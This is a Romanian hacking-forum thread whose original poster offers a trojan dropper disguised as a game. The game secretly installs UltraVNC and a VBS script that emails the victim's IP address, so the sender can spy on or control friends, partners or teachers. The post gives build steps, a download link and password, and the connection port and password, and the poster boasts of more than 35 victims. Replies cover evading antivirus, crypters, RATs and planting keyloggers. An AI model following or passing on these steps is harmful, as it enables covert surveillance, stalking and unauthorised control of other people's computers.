sa iti spionezi amicii sau pe cine vrei tu

[candymanuu]

Am facut din plictiseala si curiozitate un mic programel ( nu e programat intr-un limbaj, dar nu stiu cum sa ma exprim altfel ) pe care l-am camuflat cu un joc care odata rulat pe un Pc iti permite sa te conectezi remote.

Mai precis: dai jocu unei fete, prietene...sau "amici " , acesa/aceasta ruleaza, apare pe desktop o scurtatura si in program files jocu efectiv....in background se copiaza&instaleaza ultravnc + script vbs. Dupa primul restart , la 5 min, primesti mail cu IP-ul victimei si te poti conecta cu ultra vnc viewer la victima. Din acest moment in colo aveti full control ( sau view only ca sa nu se prinda) + file transfer.

Ce trebuie sa faceti:

1. Luati de aici: http://www.fileshare.ro/535305744.02 .Parola este : rstrst

2. Faceti rost de WISE 5.1 ( in asta l-am facut eu...banuiesc ca merge si cu alta versiune sau alt softl 5.1 are 68Mb)

3. Rulati fara frica, e inofensiv in acest moment ( nu aveti incredere...puteti incerca in VmWare)

4. Softul de instaleaza in C:\WINDOWS\system32\DirectX\Dinput; acolo gasti 2 foldere: driver si install.In install se instaleaza Uvnc. In driver se instaleaza un VBS pe care trebuie sa il modificati. Modificati DOAR mailul in vreo 3-4 locuri si parola ...e foarte usor de dat seama unde trebuie modificat. Cine stie vbs ...lasati frau liber imaginatiei ( vreau si eu idei ..care are ). Apropo' ...trebuie sa faceti un cont de mail pe @gmail.com. Incercati sa puneti un nume cat mai ciudat in caz ca victima se pricepe vreun pic sa ii fie mai greu de recunoscut ( nu prea stiu eu sa ma exprim dar sper sa intelegeti ).

5. Deschideti pachetul .msi cu wise. In tabul "installation Expert " dati in jos pana la " build options ". Acolo selectati " single file. exe ".

6. Dati SAVE , apoi COMPILE (dreapta jos)

7. ENJOY

Sper sa nu ma insel, dar cred ca atat e de facut.

Din momentul in care a-ti gasit WISE si l-ati instalat ...in maxim 2 minute ar cam trebui sa fie gata.

Cum te conectezi: http://www.uvnc.com/download/index.html , luati versiunea 1.0.2(cred ca e ultima stable), instalati, rulati Viewer , scrieti ip-ul in forma urmatoare : xxx.xxx.xxx.xxx::12340

Cand cere parola, bagati: spyshit .

nu uitati sa bifati in viewer " view only" ...fiecare cum vrea.

Tin totusi sa precizez ca este un mod destul de rudimentar de tzepuit , dar am cititi prin forum, am vazut ca nu exista ceva asemanator si m-am gandit ca sigur ii va fi de folos cuiva.

Sunt convins ca nu sunt primu care s-a gandit la chestia dar daca am fost in stare sa il fac....why not

Inca ceva....nu il folositi in scopuri distructive....eu l-am facut FOR FUN ONLY ....si in unele cazuri chiar ai parte de multe rasete .

Daca va ganditi ca nu multa lume pica in plasa ....think again.

Cu putina imaginatie, dupa ce l-ati plantat puteti face orice cu calc respectiv, planta un keylogger si accepta in antivirus( asta cand nu e victima la calc) etc...puteti pune in VBS-ul ala cam tot ce va trece prin cap

Cam atat....daca sunt probleme sau nalamuriri astept PM-uri.

[puskin]

Kaspersky il detecteaza si blocheaza

[candymanuu]

de KAV nu stiam...am facut teste pe el....stiam doar de F-Secure. O sa incerc sa vad daca pot sa il bag in lista de trusted la KAV si F-secure

[luckymyty]

super

[candymanuu]

wise il luati de aici:

http://www.fileshare.ro/535397364.5

[DLD]

Este detectat de NOD32 , Panda , Kav si blocat in acelasi timp (testate de mine ) ! bafta

[candymanuu]

hmmmm, mi se pare ciudat pt ca Nod am eu si la munca si home, kav are fosta prietena :twisted: + cateva victime....iar pe panda si pe avast am testat.

nush de ce...o sa incerc sa imi dau seama.

Singurul de care stiam era F-secure

precizez ca am nod 2.5 cu update la zi

Inca ceva...este detectat cand instaleaza sau cand este copiat ?

As putea pune cateva printscreenuri de la victime sa vedeti ca merge...

[Draqi]

Radmin ,nu sa faci doar ata si ce poti face doar, sa intri pe hard la el sa vezi ce face sa misti mouse full.. bla bla.. mai exista si Radmin invitatie bla bla il combinezi cu un joc flash cum era asta cu berile si gata

[candymanuu]

Pai si asta al meu ce crezi ca face.... :PP

[bossjuan]

poti sa im zici si mie de unde iau programul asta (WISE 5.1)sa modific si eu fisierele alea?

P.S: Pune un linck ceva pls

[puskin]

trojan dropper...

[candymanuu]

poti sa im zici si mie de unde iau programul asta (WISE 5.1)sa modific si eu fisierele alea?

P.S: Pune un linck ceva pls

vezi ca e putin mai sus....

@puskin: ce trojan dropper?

[030893]

plz contacteazama pe id Vlad93_Vlad93

[Draqi]

candymanuu,vreau sa ma ajuti la ceva, eu am facut alta versiune adica cu radmin, ii tot modificat iconu dar cand dai click pe el nu se intampla nimic si as vrea sa il combinez cu un joc flash sa zicem prostia aia care te sperie.

[SilQ]

candymanuu multumim de post man ramane sa il incerc ...

[SilQ]

man totul bine si frumos dar nu am VBS .... apoi nu merge mail decat pe gmail ?? pls urca pe rapidshare un VBS

[kabout3r]

cu putin hexing sau un crypter 0day public se poate face 80~90% UD...dar ar fi mai simplu sa folositi un rat(pi2.3.2 sau shark 3.2) cryptat...metoda lui candyman nu trece de firewall si este detectata imediat, pe cand un rat bun are functia "inject into process" facilitand camuflarea lui :wink:

[ArgentinBoy]

Ai spus ca trebuie sa facem rost de WISE 5.1

Ce e ala si de unde pot face rost de el ca nu il gasesc pe google

[k7vlad]

este cu ceateva posturi mai in urma :? http://www.fileshare.ro/535397364.5

[candymanuu]

@kabout3r trece doar de firewall-ul de windows, e bagat in lista

@SilQ nu ai nevoie de nici un VBS , editezi cu notepad, si nu stiu daca merge si pe alt mail. Eu pe @gmail am testat si merge. Azi si ieri am facut victime 2 profe ( proiecte moca:)) )

@kabout3r nu stiu hexing...si nici sa lucrez cu cryptere, daca ma poti ajuta raman dator cu bere .Oricum mie imi merge de minune, nu am gasit pe nimeni care sa nu mearga. Doar la o fata nu imi trimite mail, dar vnc porneste, tot ce am de facut e sa ii bag ip in ultravnc ca il are static si gata.

precizez ca am 35+ victime

[ArgentinBoy]

este cu ceateva posturi mai in urma :? http://www.fileshare.ro/535397364.5

Mersi mult

eu am cautat WISE 5.1 iar tu mi-ai dat WPS 5.1 de aia probabil ca nu am gasit

acum nu mai trebuie decat sa-i dau de cap

Mie nici macar nu imi merge parola la arhiva

nu merge rstrst

vreo sugestie ?

[light1]

5. Deschideti pachetul .msi cu wise. In tabul "installation Expert " dati in jos pana la " build options ". Acolo selectati " single file. exe ".

6. Dati SAVE , apoi COMPILE (dreapta jos)

7. ENJOY

despre ce pachet .msi este vorba?.... aici m'am blocat

+ cand pornesc wise package studio imi cere nume si parola si spyshit nu functioneaza

[candymanuu]

cand deschizi wise, lasi ADMIN si ii dai OK, e fara parola acolo.

Spyshit e de la altceva...daca ai fi citit mai atent ai fi observat.

Pachetul MSI este jocul....jocul nu este exe, este msi ca sa puteti sa il deschideti, sa modificati si sa il compilati.

http://www.fileshare.ro/535305744.02 .Parola este : rstrst ; TESTAT acum 1 min.

[ArgentinBoy]

Eu nu mai inteleg nimic din ce scrieti voi aici

Cred ca ma las de programul asta pana imi dau si eu seama cum functioneaza...

[eu93]

e super programelul .. am reusit dar a trebuit sa scriu eu IP-ul ... mai fac niste teste poate nu am modiifcat ceva bine in fiserul VBS..